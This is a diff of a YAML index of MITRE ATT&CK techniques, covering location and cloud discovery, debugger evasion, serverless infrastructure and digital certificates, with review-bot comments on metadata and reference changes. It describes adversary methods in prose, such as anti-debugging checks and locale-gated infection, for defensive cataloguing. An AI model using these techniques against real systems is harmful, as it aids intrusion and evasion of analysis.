- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests: []
T1518.001:
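Review bot: the `FBI Ragnar Locker 2020` reference changes host from `assets.documentcloud.org` to `s3.documentcloud.org` with a new retrieval date of September 12, 2024; please confirm the new URL was actually fetched rather than rewritten. Note also that `source_name: Securelist Trasparent Tribe 2020` keeps its "Trasparent" spelling in both the removed and re-added lines; as with the T1087.004 reference, that key must continue to match the `(Citation: Securelist Trasparent Tribe 2020)` marker in the description, so it should only be fixed together with the marker.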
@@ -52359,17 +53047,16 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests: []
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
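Review bot: the description now reads "Microsoft Graph API" (and "Entra ID" instead of "Azure AD"), but the citation marker on the same sentence is still `(Citation: Azure AD Graph API)`. Keeping the key is correct as long as the matching `source_name` in `external_references` is unchanged, but the referenced document then still describes the Azure AD Graph API, which is not what the sentence now names; please confirm the upstream object was updated the same way and, if so, leave the key as is.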
@@ -52377,10 +53064,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
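Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted here between `kill_chain_phases` and `x_mitre_contributors`, and the next hunk places `x_mitre_modified_by_ref` between `x_mitre_is_subtechnique` and `x_mitre_platforms`, with the old copies removed from the end of the object further down. Every other technique in this patch keeps both keys after `object_marking_refs`, so the key order for T1526 is the odd one out; if the file is generated, the serializer should emit a deterministic order for all objects, otherwise the diff noise will recur on the next refresh.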
@@ -52389,15 +53078,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
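Review bot: the platform rename drops `Azure AD`, `Office 365` and `Google Workspace` from x_mitre_platforms and replaces them with `Office Suite` and `Identity Provider`, which is the same mapping applied to T1538 below, so the x_mitre_version bump to 1.4 is appropriate. Anything that filters techniques by the old platform strings (per-platform index generation, for instance) will now silently match nothing, so confirm the generator is keyed on the new names before merging. Minor: the list order here is SaaS, IaaS while T1538 uses IaaS, SaaS; a stable sort in the exporter would keep these objects diffable.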
@@ -52425,9 +53115,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
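Review bot: `spec_version: '2.1'` is removed from this object and, as the rest of the patch shows, from every other technique entry in the file. spec_version is a required property on STIX 2.1 objects, so if anything downstream re-serialises these entries into a bundle or runs a STIX validator over them it will start failing. That is fine if the index is only consumed by the project's own tooling, but it deserves a sentence in the commit message saying the field was dropped deliberately and why. The x_mitre_attack_spec_version / x_mitre_modified_by_ref removals here are just the keys moving up in the object, which the previous hunks already show.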
@@ -52502,7 +53189,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests: []
T1046:
@@ -52574,7 +53260,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests: []
T1518:
@@ -52623,12 +53308,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests: []
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -52649,12 +53333,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -52679,7 +53362,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
@@ -52734,7 +53416,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
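Review bot: the `modified` timestamp moves backwards here, from 2022-05-11 to 2022-04-16, which an export from a newer ATT&CK release should never do. The same regression appears further down for T1583.002, T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002 and T1584.003, all of which drop back to 2021 dates. That pattern suggests these objects were regenerated from an older bundle rather than the current one; please confirm the source the index was built from, or pin the generator to a single release so mixed snapshots cannot end up in one file.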
@@ -52754,7 +53436,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
@@ -52857,13 +53538,12 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests: []
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -52874,7 +53554,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -52945,29 +53625,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
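Review bot: the new description text writes "Google Apps Scripts"; the product is "Google Apps Script" (singular), which is also how the cited article title in the next hunk spells it. Suggest `such as Cloudflare Workers, AWS Lambda functions, or Google Apps Script`. The rest of the hunk is consistent: the new `(Citation: GWS Apps Script Abuse 2021)` key has a matching external_references entry added in the following hunk, the [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) link justifies the x_mitre_version bump to 1.1, and the contributor / platform / detection key moves are pure reordering.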
@@ -52991,15 +53670,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.007:
technique:
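Review bot: the added reference URL ends in `#google_vignette`, which is the fragment BleepingComputer's ad overlay appends to the address bar, not part of the article's canonical URL. Strip it so the entry reads `url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/`; otherwise every future export will carry the artefact and anyone deduplicating references by URL will see this as a distinct source.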
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -53031,17 +53713,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -53094,11 +53775,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -53134,7 +53814,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -53183,43 +53863,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -53232,18 +53881,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1583.002:
technique:
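Review bot: nearly all of T1588.004 shows up as removed and re-added (the block deleted at the top of the previous hunk reappears here after the description) purely because the object is now emitted in a different key order. The substantive changes are small: the Recorded Future URL moves to `/research/cobalt-strike-servers` with the retrieval date updated, `revoked: false` and `x_mitre_deprecated: false` are added, and x_mitre_attack_spec_version goes to 3.2.0, while x_mitre_version correctly stays at 1.2 since the content did not change. Have the exporter sort keys deterministically so future diffs only show real edits; reviewing the reference list for accidental drops is hard when it is rewritten wholesale.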
@@ -53265,7 +53945,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
